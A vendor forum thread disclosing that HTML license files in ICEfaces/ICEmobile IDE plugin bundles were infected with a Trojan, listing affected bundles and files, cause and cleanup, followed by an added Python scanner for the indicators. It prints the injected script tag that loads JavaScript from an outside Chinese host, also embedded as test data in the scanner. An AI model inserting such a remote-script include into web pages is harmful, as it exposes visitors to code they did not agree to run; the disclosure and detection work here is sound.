Possible Malware Exposure via IDE Integration Bundles
ken.fyten

Joined: 26/Oct/2004 00:00:00
Messages: 1341
Offline


It was recently discovered that certain license and documentation HTML files included in our IDE integration bundles have been corrupted with a Trojan.Malscript!html malware. This malware adds JavaScript to the pages in question that executes when the page is loaded in the browser. The malware JavaScript seems to dynamically load JavaScript from a site which then attempts to open a Chinese shopping website in a popup window. Note that if your browser settings have popup windows disabled (the default setting in newer browsers), you may never see this popup at all.

The current version of this JavaScript file appears to be innocuous other than the SPAM-like nature of the popup window, so no user systems should be affected/infected by simply viewing the corrupted HTML files. However, to reduce the possibility of any negative impacts from this exposure, ICEsoft recommends scanning your system using the Norton/Symantec family of malware detection tools. Note that other similar products have not successfully detected this specific malware in our testing (AVS, Microsoft Security Essentials).

All the affected IDE bundles have been temporarily removed from the www.icesoft.org download site to prevent any further propagation of the malware-infected files. These will be updated to remove the corrupted HTML files and re-posted to the download site as they become available, starting with the most recent product releases.


Who is impacted?

All users of the ICEfaces/ICEmobile IDE Eclipse-family integration bundles for releases occurring after November 1st, 2012. This includes Eclipse, MyEclipse, and IBM RAD IDE tool bundle releases starting with and including the ICEfaces 3.2 open-source release on Nov. 2, 2012. Note that the ICEmobile 1.2, 1.3, and EE variants, and the ICEfaces EE 1.8.2.GA_P06 and P07 releases are also affected as they are provided in the same IDE bundles as the ICEfaces 3.x releases.

IDE integration bundles released prior to Nov. 2, 2012 are not affected, nor are the NetBeans integration bundles.

The full list of affected IDE bundles is provided below:

ICEfaces 3.2 / ICEmobile 1.2

  • ICEfaces-3.2.0b-Eclipse-4.2-Plugins.zip
  • ICEfaces-3.2.0–Eclipse-3.8-4.2-plugins.zip
  • IF-3.2.0-IM-1.2.0-Eclipse-3.8-4.2-Plugins.zip

ICEfaces 3.3 / ICEmobile 1.2 & 1.3

  • IF-3.3.0-IM-1.3.0-Eclipse-4.2-plugins.zip
  • IF-3.3.0a-IM-1.2.0-Eclipse-4.2-plugins.zip
  • IF-3.3.0–IM-1.2.0-Eclipse-4.2-plugins.zip

ICEfaces EE 3.0.0.GA_P01 / EE 1.8.2.GA_P04 & P05 / ICEmobile EE 1.0.0.GA_P01

  • IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-Eclipse-3.7-4.2-plugins.zip
  • IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-MyEclipse-10-plugins.zip
  • IF-IM-EE-3.0.0.GA_P01-RAD-8-plugins.zip
  • IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-RAD-8-Plugins.zip

ICEfaces EE 3.2.0.GA / EE 1.8.2.GA_P05 & P06 / ICEmobile EE 1.2.0.GA

  • IF-EE-3.2.0-1.8.2.P06-IM-EE-1.2.0-Eclipse-4.2-plugins.zip
  • IF-EE-3.2.0-1.8.2.P06-IM-EE-1.2.0-MyEclipse-10-plugins.zip
  • IF-EE-3.2.0-1.8.2_P05-IM-EE-1.2.0-Eclipse-4.2-plugins.zip
  • IF-EE-3.2.0-1.8.2.P05-IM-EE-1.2.0-MyEclipse-10-plugins.zip

ICEfaces EE 3.3.0.GA / EE 1.8.2.GA_P06 & P07 / ICEmobile EE 1.3.0.GA

  • IF-EE-3.3.0-1.8.2.P07-IM-EE-1.3.0-Eclipse-4.3-plugins.zip
  • IF-EE-3.3.0-1.8.2.P07-IM-EE-1.3.0-MyEclipse-2013-plugins.zip
  • IF-EE-3.3.0-1.8.2.P06-IM-EE-1.3.0-Eclipse-4.2-plugins.zip
  • IF-EE-3.3.0-1.8.2.P06-IM-EE-1.3.0-MyEclipse-2013-plugins.zip


What is the nature of the malware?

The malware itself consists of the following two elements being added to the HTML page:
Code:
 <HEAD>
 ...
 <script language="javascript" type="text/javascript" src="http://js.i8844.cn/js/user.js"></script>
 </HEAD>

  • This loads "user.js" from a site in China. This JS dynamically opens the shopping site in a new window (which is created by the img tag below).

Code:
 <BODY>
 ...
 <img src="http://www.baidu.com/search/img/logo.gif"    />
 </body>

  • This opens the new window that the user.js script uses to redirect to the shopping website.

Which files inside the bundles are affected?

The specific files that are affected in each IDE bundle are noted below:

  • Eclipse

    • org.icefaces.eclipse.jst.pagedesigner_xxx/license.html
    • /org.icefaces.eclipse.jst.core_xxx/about.html
    • org.icefaces.eclipse.jst.doc_xxx/license.html
    • /features/org.icefaces.eclipse.jst.feature_xxx/license_community.html
    • /features/org.icefaces.eclipse.jst.pagedesigner.feature_xxx/license_community.html

  • MyEclipse

    • /org.icefaces.eclipse.jst.pagedesigner/license.html

  • RAD

    • (Only affects the IF-EE-3.0.0.P01-1.8.2.P05-IM-EE-1.0.0.P01-RAD-8-Plugins bundle)
    • /plugins/org.icemobile.rad.jst.core_1.0.1.201212111051/about.html
    • /plugins/org.icefaces.rad.visualizer_3.0.3.201212111051/license.html
    • plugins/org.icemobile.rad.jst.core_1.0.1.201212111051/about.html
    • /plugins/org.icefaces.rad.jst.doc_3.0.3.201212111051/license.html
    • /features/org.icefaces.rad.jst.feature_3.0.3.201212111051/license_community.html


How did this occur?

This malware was evidently introduced into our source-code repository via an infected developer workstation in late 2012. The infected workstation would modify static HTML pages on the system to add the malware JavaScript elements. Unfortunately, the ICEsoft product release testing process did not detect this issue previously.


What are the next steps?

All the affected IDE bundles have been temporarily removed from the www.icesoft.org download site to prevent any further propagation of the malware-infected files. These will be updated to remove the corrupted HTML files and re-posted to the download site as they become available, starting with the most recent product releases and working backwards.

To reduce the possibility of any negative impacts from this exposure, ICEsoft recommends scanning your system using the Norton/Symantec family of malware detection tools. Note that other similar products have not successfully detected this specific malware in our testing (AVS, Microsoft Security Essentials).

Finally, the ICEsoft product release process will be improved to add a more robust malware detection procedure to try to prevent any similar incidents from occurring in the future.

We apologize for the inconvenience this issue may cause and appreciate your patience while we work to rectify this issue.

[Edited on 8/4/2013 to add more bundle entries]

Ken Fyten
VP Product Development
ICEsoft Technologies, Inc.
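A bundle checker for the two injected elements described in the post above, added here as an example (it is not ICEsoft's tooling): it opens a plugin bundle .zip, parses every HTML member, and reports pages whose script or img src points at the indicator hosts named in the post, without ever fetching them. The sample bundle it builds is constructed test data, and the plugin paths inside it are assumed.

```python
import io
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator hostnames from the advisory; only compared, never fetched.
SCRIPT_HOST = "js.i8844.cn"
IMG_HOST = "www.baidu.com"

class _MarkerParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):  # record <script>/<img> hitting an indicator host
        src = dict(attrs).get("src") or ""
        host = urlparse(src).hostname or ""
        if tag == "script" and host == SCRIPT_HOST:
            self.hits.append(("script", src))
        elif tag == "img" and host == IMG_HOST:
            self.hits.append(("img", src))

def scan_html(text):
    """Return [(element, src), ...] for the indicators found in one HTML page."""
    p = _MarkerParser()
    p.feed(text)
    return p.hits

def scan_bundle(zip_bytes):
    """Map each HTML member of a plugin .zip that carries an indicator to its hits."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".html", ".htm")):
                hits = scan_html(zf.read(name).decode("utf-8", errors="replace"))
                if hits:
                    findings[name] = hits
    return findings

def build_sample_bundle():
    """Constructed bundle: one clean page plus one carrying both injected elements."""
    clean = "<html><head><title>License</title></head><body>BSD</body></html>"
    bad = ('<HTML><HEAD><script type="text/javascript" '
           'src="http://js.i8844.cn/js/user.js"></script></HEAD><BODY>'
           '<img src="http://www.baidu.com/search/img/logo.gif" /></body></HTML>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("plugins/org.icefaces.eclipse.jst.doc_xxx/license.html", clean)
        zf.writestr("plugins/org.icefaces.eclipse.jst.core_xxx/about.html", bad)
    return buf.getvalue()
```

Run scan_bundle over the bytes of a downloaded bundle; an empty result means none of its HTML pages carry either injected element.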
ken.fyten


The process to clean and rebuild the affected bundles above has been completed.

Note that the updated bundles have a "...-A.zip" suffix on the file-name and a recent posting date to indicate they are the "cleaned" versions and safe to download and use. Of course, the original infected bundles have been permanently removed from download.

In addition, new release procedures have been put in place that should prevent this sort of incident from re-occurring in the future.

We once again would like to apologize for any inconvenience this issue may have caused.

Regards,
Ken




Ken Fyten
VP Product Development
ICEsoft Technologies, Inc.
ken.fyten


Edited the original list of affected bundles to remove the following entries, which were never affected and were erroneously included in the original listing:

  • ICEfaces-EE-3.0.0.GA_P01-1.8.2.GA_P04-Eclipse-3.7-4.2-plugins.zip
  • ICEfaces-EE-3.0.0.GA_P01-1.8.2.GA_P04-MyEclipse-10-plugins.zip
  • IF-EE-3.0.0.GA_P01-IM-EE-1.0.0.GA_P01-Eclipse-3.7-4.2-plugins.zip
  • IF-IM-EE-3.0.0.GA_P01-1.0.0.GA_P01-MyEclipse-10-plugins.zip


Ken Fyten
VP Product Development
ICEsoft Technologies, Inc.